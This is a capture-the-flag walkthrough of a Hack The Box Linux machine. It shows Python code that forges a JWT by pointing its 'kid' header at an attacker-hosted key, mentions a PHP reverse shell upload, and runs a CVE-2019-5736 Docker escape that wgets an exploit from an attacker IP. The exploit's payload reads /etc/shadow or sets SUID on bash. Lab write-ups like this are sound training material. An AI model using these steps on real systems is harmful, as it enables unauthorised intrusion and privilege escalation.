The Notebook

Summary

The Notebook, a linux medium difficulty box was created by Hackthebox user mostwanted002.Initial Foothold of the box was using our own key server and forging the auth (JWT) token and pointing the kid to be a remote kid and getting admin capabilities. which gave us access to an admin panel which have upload feature, using which we can get a reverse shell as www-data. Lateral movement to noah was easy it was about finding the backup of user home folder which contained the private key of user using which we can ssh to the user. After getting enumerating the box we see (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01* which means we can exec into a pod. enumerating more and google around escaping docker container we see we can do that using a CVE CVE-2019-5736 using which we get root on the box.

Initial Enumeration

nmap

# Nmap 7.91 scan initiated Sun Mar  7 09:55:33 2021 as: nmap -sC -sV -oN nmap/thenotebook 10.10.10.230
Nmap scan report for 10.10.10.230
Host is up (0.080s latency).
Not shown: 997 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 86:df:10:fd:27:a3:fb:d8:36:a7:ed:90:95:33:f5:bf (RSA)
|   256 e7:81:d6:6c:df:ce:b7:30:03:91:5c:b5:13:42:06:44 (ECDSA)
|_  256 c6:06:34:c7:fc:00:c4:62:06:c2:36:0e:ee:5e:bf:6b (ED25519)
80/tcp    open     http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: The Notebook - Your Note Keeper
10010/tcp filtered rxapi
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar  7 09:55:46 2021 -- 1 IP address (1 host up) scanned in 12.89 seconds

We see port 22, 80 open, lets start with port 80

Web

Opening the web we see a initial home page as

and we check register and login

lets register and check the service

and successful Registration we see a JWT token.

so placed the token in jwt.io

seeing it have something called admin_cap i thought of forging the token with

but that didn’t work. In the Above token we see something as kid so I thought of creating a token with key being served from a http server.

import jwt
import json
payload={
  "username": "f3v3r",
  "email": "f3v3r@localhost",
  "admin_cap": 1
}
key = open("./key.pem",'r').read();

strPayload=json.dumps(payload)

encoded = jwt.encode(payload, key, algorithm="RS256",headers={"kid": "http://10.10.14.X:8000/key.pem"})

print("encoded",encoded)

and trying that token we get admin panel access

and editing the cookie get us admin panel

In admin panel we see we can upload any files.

so i uploaded an php reverse shell and opening that link get me a www-data shell

Shell (www-data)

Enumerating the box i found home.tar.gz in /var/backups checking that we find noah ssh key.

using that we can ssh on the box as noah

Shell (noah)

Enumerating the box more i saw

$ sudo -l
Matching Defaults entries for noah on thenotebook:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User noah may run the following commands on thenotebook:
    (ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*

we know we can run docker exec in webapp

so i exec in the pod using

sudo /usr/bin/docker exec -it webapp-dev01 bash

In the container i saw a sqlite db which contain a hint (Maybe)

Backups are scheduled Finally! Regular backups are necessary. Thank god it's all easy on server

but exploring that was a dead end for me.

Going back to docker escape

I found a CVE-2019-5736

sudo /usr/bin/docker exec -it webapp-dev01 sh
cd /tmp/
wget http://10.10.14.X:8000/exploit
chmod +x exploit
./exploit

and running

sudo /usr/bin/docker exec -it webapp-dev01 sh

to trigger in a different ssh session

and to build the exploit

i changed this

var payload = "#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"

to

var payload = "#!/bin/bash \n chmod +s /bin/bash"

and build the exploit by running

go build main.go

and using that i got root

Extra

After getting root i went back to www-data to noah path and thought about if there was any hint which i could have found to make that part easier. So I check the web-app database and saw if we had forgue the username as admin we could have also got few admin notes which told about there is a backup running.